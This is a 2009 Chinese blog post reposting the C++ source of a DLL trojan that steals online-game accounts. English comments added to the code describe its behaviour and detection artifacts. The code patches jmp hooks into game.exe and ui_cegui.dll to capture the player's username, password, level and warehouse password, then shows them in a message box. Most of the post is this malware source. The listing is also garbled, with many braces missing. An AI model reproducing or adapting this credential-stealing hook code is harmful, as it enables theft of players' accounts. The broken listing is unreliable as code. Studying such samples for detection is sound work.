VC++盗号木马源码分析

VC++ 网游dll盗号木马源码(2009-09-06 12:19)

前段时间,在lonkil前辈的网站上看到的一款DLL网游木马源码,确实佩服...(幸亏这类牛人没走这道儿,不然中国网民会死得很惨的~~~~)

/** main.cpp **/

#include <windows.h> 
// Global state of the hook DLL. The comments in this listing are written
// from the analyst's side: they describe what the code does and what it
// leaves behind, so the sample can be recognised and defended against.
//
// Byte signatures searched for inside loaded modules (CmpFlag / GetRealFlag):
// userCode is looked up in game.exe, gradeCode and storeCode in ui_cegui.dll.
// Matching a short opcode sequence ties the sample to one specific client
// build; if the bytes are not found, the Hook* functions return without
// patching anything (CmpFlag returns 0).
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; 
// Six-byte patch written over each signature: 0xE9 (jmp rel32), a 4-byte
// displacement filled in at runtime by the Hook* functions, and a 0x90 pad.
// Detection angle: after patching, the in-memory .text of game.exe and
// ui_cegui.dll no longer matches the on-disk image.
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; 
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; 
// Original six bytes saved by HookStroe so that StroeUnhook can restore them.
BYTE oldStoreCode[6]={0}; 
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
// Base of the private RWX copy of ui_cegui.dll made by CmpFlag
// (written in HookGrade, reused by HookStroe).
DWORD ui_cegui; 
// Resume addresses for the three trampolines. They point into the copied
// image, not into the patched original (see *lpRet in CmpFlag).
void *lpUserRet=NULL; 
void *lpGradeRet=NULL; 
void *lpStoreRet=NULL; 
// Captured data, held in plaintext inside the hooked process. All three
// are filled by an unbounded strcpy (GetUserBuff / GetStoreBuff), so a
// value longer than 39 bytes overruns these globals.
char user[40]; 
char pass[40]; 
char storePassWord[40]; 
DWORD dwGrade; 
// Address of the currently installed store-password hook; 0 when none.
DWORD stroePath=0; 
void _stdcall StroeUnhook(); 
void _stdcall HookStroe(); 
// Locate `flag` (len bytes) inside the already-loaded module `moduleName`.
// Side effects: allocates a PAGE_EXECUTE_READWRITE copy of the whole module
// image with VirtualAlloc, stores its base in *lpModule, and sets *lpRet to
// the match position inside that COPY. Returns the match address inside the
// real module, or 0 when the module is absent or the bytes are not found.
// The copy is never released (there is no VirtualFree anywhere in the
// listing) and the VirtualAlloc result is not checked.
// Detection angle: a module-sized RWX allocation followed by a full-image
// memcpy is not something a game client normally does to itself.
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) 

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName); 
if(hModule==NULL) 

// Failure is announced with a visible message box: this is a
// demonstration, not code written to stay unnoticed.
::MessageBox(NULL,"获取模块错误","failed",0); 
return 0; 
}

// PE walk: hModule+0x3c is e_lfanew; NT headers + 0x50 is
// OptionalHeader.SizeOfImage for a PE32 image (32-bit only).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); 
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
*lpModule=(DWORD)newModule; 
memcpy(newModule,(void*)hModule,imageSize);

// Linear byte scan of the copy. The loop bound is i<imageSize, not
// i+len<=imageSize, so the last len-1 comparisons read past the allocation.
for(DWORD i=0;i<imageSize;i++) 

buff=(BYTE*)((DWORD)newModule+i); 
if(memcmp(buff,flag,len)==0) 

   
   // *lpRet: position in the copy (later used as the trampoline's resume
   // address); return value: the same offset translated into the real module.
   *lpRet=(void*)buff; 
   return i+(DWORD)hModule; 
   

   
}

return 0;


// Same scan as CmpFlag, but over an existing copy (`newModule`, the base
// that CmpFlag stored earlier) instead of allocating a new one.
// *lpRet receives the match address in the copy; the return value is the
// corresponding address in the real module, 0 on failure. Only HookStroe
// calls this, re-searching the ui_cegui.dll copy every time it runs.
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule) 

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL) 

// Visible failure notice, as in CmpFlag.
::MessageBox(NULL,"获取模块错误","failed",0); 
return 0; 

// Scan length comes from the real module's PE32 SizeOfImage, so this
// assumes `newModule` is at least imageSize bytes long (true for a copy
// produced by CmpFlag on the same module).
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); 
for(DWORD i=0;i<imageSize;i++) 

buff=(BYTE*)(newModule+i); 
if(memcmp(buff,flag,len)==0) 

   
   // Same over-read at the tail of the buffer as in CmpFlag (no i+len bound).
   *lpRet=(void*)buff; 
   return i+(DWORD)hModule; 
   

   

return 0;


// Trampoline target reached from GetUserAndPass: copies the two strings the
// hooked code was handling into the global user/pass buffers.
// _stdcall because the naked stub pushes the arguments by hand and relies on
// the callee to pop them. No length check: strcpy into 40-byte globals.
void _stdcall GetUserBuff(char *userName,char *passWord) 

strcpy(user,userName); 
strcpy(pass,passWord);

return;


// Naked trampoline installed over the userCode signature in game.exe
// (HookUserAndPass). No prologue/epilogue is generated, so register state
// is handled by hand; only eax is explicitly preserved.
__declspec(naked)void GetUserAndPass() 

_asm 

// save eax, then redo the load that the overwritten instruction performed
push eax; 
mov eax,dword ptr ss:[ebp+0xC]; 
// stdcall pushes right-to-left: [ebp+0xC] becomes passWord, ecx becomes userName
push eax; 
push ecx; 
call GetUserBuff; 
// drop the store-password hook if one is pending
call StroeUnhook; 
pop eax; 
// resume inside the COPY of game.exe made by CmpFlag, where the original
// bytes are still intact; what happens after that depends on the copied code
jmp [lpUserRet]; 


// Trampoline target reached from GetGrade: records the value the hooked
// instruction was storing (passed in ebx by the naked stub) as the level.
void _stdcall GetGradeDword(DWORD grade) 

dwGrade=grade; 
return;


// Naked trampoline installed over the gradeCode signature in ui_cegui.dll
// (HookGrade). Saves all general registers, records ebx as the level, then
// installs the store-password hook (HookStroe). That hook is removed again
// by StroeUnhook once GetStore or GetUserAndPass fires.
__declspec(naked)void GetGrade() 

_asm 

pushad; 
// ebx holds the value the matched instruction was about to store
push ebx; 
call GetGradeDword; 
call HookStroe; 
popad; 
// resume inside the copy of ui_cegui.dll (see CmpFlag / lpGradeRet)
jmp [lpGradeRet]; 


// Remove the store-password hook by writing the six saved bytes back over
// the patch site. No-op when no hook has been installed (stroePath==0);
// stroePath itself is never reset, so later calls rewrite the same bytes.
void _stdcall StroeUnhook() 

if(stroePath==0) 
return; 
MEMORY_BASIC_INFORMATION mbi; 
// VirtualProtect's last parameter is the old-protection out value. It is
// aimed at a MEMORY_BASIC_INFORMATION here, so the old value lands in
// mbi.BaseAddress while mbi.Protect (read two lines down) is never written.
// The protection "restored" by the second call is therefore indeterminate.
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)stroePath,oldStoreCode,6); 
VirtualProtect((void*)stroePath,7,mbi.Protect,0); 
return;


// Trampoline target reached from GetStore: captures the warehouse ("store")
// password (ecx at the hook site) and then shows everything collected so
// far in a MessageBox. This is the only output path on this page: no file
// write or network code appears anywhere in the listing.
// "/n" in the format string is a literal slash-n, not a newline.
void _stdcall GetStoreBuff(char *storePass) 

// unbounded strcpy into a 40-byte global, as in GetUserBuff
strcpy(storePassWord,storePass); 
char data[256]; 
wsprintf(data,"用户名:%s/n密码:%s/n等级:%d/n仓库密码:%s/n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);


// Naked trampoline installed 0x43 bytes past the storeCode signature in
// ui_cegui.dll (HookStroe). Saves all general registers, hands ecx to
// GetStoreBuff, removes its own hook, and resumes inside the copied image.
__declspec(naked)void GetStore() 

_asm 

pushad; 
// ecx is passed as the storePass argument
push ecx; 
call GetStoreBuff; 
// one-shot: the hook restores the original bytes right after capturing
call StroeUnhook; 
popad; 
jmp [lpStoreRet]; 
   
   


// Install the store-password hook in ui_cegui.dll. Re-finds storeCode in the
// copy made earlier by HookGrade (global ui_cegui), then patches not the
// signature itself but the instruction 0x43 bytes after it, shifting the
// resume address inside the copy by the same 0x43. Called from the GetGrade
// trampoline every time that hook fires; calling it again while the patch is
// still in place would save the patch bytes, not the originals, into oldStoreCode.
void _stdcall HookStroe() 

stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui); 
if(stroePath==0) 
return ; 
stroePath=stroePath+0x43; 
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); 
// rel32 displacement for the E9 jmp: target - (patch address + 5)
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); 
*(DWORD*)(&storeJmpCode[1])=jmpAddress; 
// keep the six original bytes so StroeUnhook can put them back
memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi; 
// Same VirtualProtect/mbi mix-up as in StroeUnhook: the old protection is
// written into mbi.BaseAddress, and mbi.Protect used below is uninitialised.
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)stroePath,storeJmpCode,6); 
VirtualProtect((void*)stroePath,7,mbi.Protect,0); 
return;


// Install the level hook in ui_cegui.dll: CmpFlag makes the RWX copy of the
// module (base kept in the global ui_cegui for HookStroe) and finds the
// gradeCode signature; the first six bytes of the match in the real module
// are then overwritten with a jmp to GetGrade.
void HookGrade() 
{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui); 
if(passPath==0) 
return ; 
// rel32 displacement for the E9 jmp: target - (patch address + 5)
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5); 
*(DWORD*)(&gradeJmpCode[1])=jmpAddress; 
MEMORY_BASIC_INFORMATION mbi; 
// Same VirtualProtect/mbi mix-up as in StroeUnhook: mbi.Protect is never
// written by VirtualProtect, so the restored protection is indeterminate.
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)passPath,gradeJmpCode,6); 
VirtualProtect((void*)passPath,7,mbi.Protect,0);


// Install the credential hook in game.exe: CmpFlag copies the module and
// finds the 7-byte userCode signature; the first six bytes of the match in
// the real module are overwritten with a jmp to GetUserAndPass. The copy's
// base is kept only in a local (hModule) and is never freed or reused.
void HookUserAndPass() 

DWORD hModule; 
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule); 
if(passPath==0) 
return ; 
// rel32 displacement for the E9 jmp: target - (patch address + 5)
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5); 
*(DWORD*)(&userJmpCode[1])=jmpAddress; 
MEMORY_BASIC_INFORMATION mbi; 
// Same VirtualProtect/mbi mix-up as in StroeUnhook: mbi.Protect is never
// written by VirtualProtect, so the restored protection is indeterminate.
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)passPath,userJmpCode,6); 
VirtualProtect((void*)passPath,7,mbi.Protect,0); 

// Worker started from DllMain: installs the two persistent hooks. The
// store-password hook is not installed here; GetGrade adds it on demand.
// Return values of the Hook* calls are not available (they return void), so
// a failed signature match is not reported back.
DWORD WINAPI Thread(LPVOID lpParam) 

HookUserAndPass(); 
HookGrade();

return 0; 

// DLL entry point. On DLL_PROCESS_ATTACH it starts Thread() to install the
// hooks and returns TRUE immediately; other reasons are ignored and nothing
// is undone on detach. Nothing on this page shows how the DLL gets into
// game.exe: the loading side is not part of the listing.
// For defenders, the observable artifacts are a thread created from DllMain
// of an unexpected module, module-sized RWX allocations, and code pages of
// game.exe / ui_cegui.dll that differ from the on-disk image.
BOOL APIENTRY DllMain( HANDLE hModule, 
       DWORD ul_reason_for_call, 
       LPVOID lpReserved 
       ) 
{

switch(ul_reason_for_call) 

case DLL_PROCESS_ATTACH: 

   DWORD ThreadId; 
   // thread handle is discarded; size/flags arguments are passed as NULL
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId); 
   break; 

   
default:break; 
}

return TRUE;

 
